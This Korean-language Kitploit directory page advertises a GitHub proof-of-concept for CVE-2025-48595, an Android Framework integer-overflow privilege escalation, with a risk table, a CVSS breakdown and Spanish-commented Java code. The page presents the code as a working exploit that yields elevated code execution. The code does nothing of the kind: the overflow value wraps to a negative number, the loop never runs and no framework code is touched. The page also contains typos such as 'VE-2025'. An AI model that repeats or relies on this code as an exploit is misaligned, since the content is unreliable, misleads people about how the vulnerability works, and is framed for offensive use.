Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595는 Android Framework의 여러 위치에서 **정수 오버플로우 (integer overflow)** 취약점입니다. | Kitploit
도구/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Android SecurityPrivilege EscalationVulnerability AnalysisExploitationMobile SecurityBinary Exploitation
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595는 Android Framework의 여러 위치에서 **정수 오버플로우 (integer overflow)** 취약점입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
122개월 전아직 검토되지 않음

CVE-2025-48595 - Android Framework 정수 오버플로 취약점

Critical CVE KEV

설명

CVE-2025-48595는 Android Framework의 여러 위치에서 정수 오버플로(integer overflow) 취약점입니다. 이 결함은 코드 실행을 가능하게 하여 추가 실행 권한 없이 로컬 권한 상승으로 이어집니다. 악용을 위해 사용자 상호작용이 필요하지 않습니다.

위험 상태

항목상태
활성 악용✅ 확인됨 (제한적이고 세분화된 악용)
CISA KEV 목록 등록✅ 예
KEV 추가 날짜2026-06-02
만료 날짜2026-06-05
패치 사용 가능✅ 예

영향을 받는 시스템

Android 버전영향 여부
Android 14✅ 예
Android 15✅ 예
Android 16✅ 예
Android 16 QPR2✅ 예

공격 벡터

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

개념 증명 (POC)

POC 설명

다음 코드는 Android Framework에서 정수 오버플로를 유발하는 악성 데이터 전송을 통해 취약점을 악용하는 방법을 보여줍니다. 이를 통해 상승된 권한으로 임의 코드 실행이 가능합니다.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
도구 다운로드
메트릭값
공격 벡터로컬 (AV:L)
공격 복잡도낮음 (AC:L)
필요한 권한없음 (PR:N)
사용자 상호작용없음 (UI:N)
기밀성 영향높음 (C:H)
무결성 영향높음 (I:H)
가용성 영향높음 (A:H)